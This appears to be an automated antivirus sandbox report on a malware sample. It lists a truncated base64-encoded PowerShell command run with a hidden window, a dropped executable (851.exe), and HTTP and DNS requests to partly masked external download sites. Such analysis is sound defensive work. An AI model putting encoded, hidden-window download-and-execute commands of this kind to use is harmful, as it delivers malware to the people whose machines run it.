Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAGEAbwBoAGoAbwB1AHQAaAB3AG8AaQB6AD0AJwBoAGUAYQBtAGgAZQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAcgBgAGkAVABZAFAAUgBgAG8AdABvAGMATwBsAC...
Modifies file system
Creates the following files
- %HOMEPATH%\851.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
Network activity
TCP
HTTP GET requests
- http://ho####fgriffin.org/weblog/v76/
- http://ho##y.com/cgi-bin/Bv8y33Cmr/
- http://li####uebles.com.ar/cgi-bin/wz4rxd/
UDP
- DNS ASK ho####fgriffin.org
- DNS ASK ho##y.com
- DNS ASK li####uebles.com.ar
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAGEAbwBoAGoAbwB1AHQAaAB3AG8AaQB6AD0AJwBoAGUAYQBtAGgAZQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAcgBgAGkAVABZAFAAUgBgAG8AdABvAGMATwBsAC...' (with hidden window)
